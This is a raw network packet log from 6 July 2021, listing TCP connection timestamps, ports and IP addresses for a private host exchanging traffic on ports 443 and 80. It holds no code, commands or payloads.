Jul 6, 2021 14:31:02.011950970 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.011965990 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.011996984 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.012032986 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.012053967 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.016474962 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.016823053 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016870975 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016889095 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016908884 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016906977 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.016922951 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016937971 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016951084 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.016958952 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.016967058 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017070055 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.017118931 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017138004 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017148018 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017159939 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.017162085 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017182112 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017187119 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.017199993 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017215967 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017219067 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.017227888 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017242908 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:02.017266035 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.017298937 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:02.024158955 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:02.024272919 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:02.038577080 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:02.038697004 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:02.042793989 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:02.042864084 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:02.043947935 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.044517994 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.044619083 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.044660091 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.044698000 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.044740915 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.044826984 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.044867039 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.047658920 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.047681093 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.047693968 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.047735929 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.047758102 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.048428059 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.060926914 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.061202049 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.061444044 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.061530113 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.061549902 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.061609983 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.061628103 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.061676025 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.081682920 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.081926107 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.082254887 CEST	49879	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.085119963 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.085215092 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.086342096 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.118850946 CEST	80	49879	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.118968010 CEST	49879	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.122929096 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.126102924 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.126171112 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.145881891 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145915031 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145934105 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145951986 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145962000 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.145970106 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145987988 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.145991087 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.146045923 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.146047115 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.146064043 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.146080017 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.146090031 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.146116018 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.146133900 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.146174908 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.182791948 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182821035 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182838917 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182856083 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182866096 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.182873964 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182893991 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182897091 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.182919979 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182938099 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182948112 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.182955980 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182972908 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.182976961 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.182995081 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183003902 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183012962 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183023930 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.183031082 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183048964 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183059931 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.183063984 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183084011 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183103085 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.183104038 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183135033 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.183152914 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.183190107 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183197021 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.183237076 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220396996 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220443010 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220491886 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220504045 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220601082 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220608950 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220613956 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220618963 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220637083 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220648050 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220655918 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220669031 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220675945 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220685005 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220700979 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220702887 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220720053 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220736027 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220752954 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220767021 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220768929 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220786095 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220793009 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220807076 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220824957 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220833063 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220843077 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220860004 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220860958 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220876932 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220894098 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220896006 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220911026 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220927000 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220937967 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220947027 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220964909 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.220972061 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.220982075 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221000910 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221040964 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221178055 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221239090 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221254110 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221302032 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221311092 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221340895 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221360922 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221363068 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221379042 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221395969 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221395969 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221414089 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221435070 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221445084 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221462965 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221478939 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221478939 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221499920 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221513033 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221518040 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221534014 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.221545935 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.221580029 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258054018 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258079052 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258179903 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258203983 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258352995 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258404970 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258465052 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258505106 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258522034 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258522987 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258538008 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258553028 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258585930 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258588076 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258604050 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258620977 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258639097 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258687973 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258697033 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258713961 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258743048 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258749962 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258759022 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258778095 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258791924 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258793116 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258826017 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258841038 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258843899 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258861065 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258862019 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258877993 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258894920 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258903027 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258912086 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258930922 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258945942 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258949995 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258969069 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.258980036 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.258985043 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259002924 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259018898 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259020090 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259036064 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259051085 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259052992 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259094000 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259098053 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259120941 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259150982 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259157896 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259180069 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259197950 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259198904 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259213924 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259231091 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259231091 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259247065 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259253025 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259290934 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259294987 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259311914 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259330034 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259330988 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259346008 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259362936 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259370089 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259378910 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259393930 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259409904 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259411097 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259428024 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259438038 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259447098 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259465933 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259483099 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259499073 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259500027 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259517908 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259527922 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259532928 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.259561062 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.259591103 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.260624886 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260657072 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260674953 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260685921 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.260736942 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.260740042 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260757923 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260773897 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.260791063 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.260824919 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261059999 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261080027 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261097908 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261106968 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261154890 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261358976 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261384010 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261405945 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261408091 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261450052 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261544943 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261574030 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261593103 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261601925 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261624098 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261631012 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261640072 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261676073 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261678934 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261715889 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261879921 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261898994 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261914968 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261930943 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261931896 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261949062 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.261974096 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.261980057 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.262010098 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.262043953 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.262054920 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.262074947 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.262088060 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.262106895 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.262115002 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.262147903 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.262181997 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.262223959 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295444012 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295478106 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295496941 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295512915 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295541048 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295561075 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295579910 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295586109 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295617104 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295643091 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295661926 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295691013 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295726061 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.295943975 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295964003 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295979977 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.295989990 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296015978 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296052933 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296071053 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296087980 CEST	80	49878	45.90.58.179	192.168.2.4
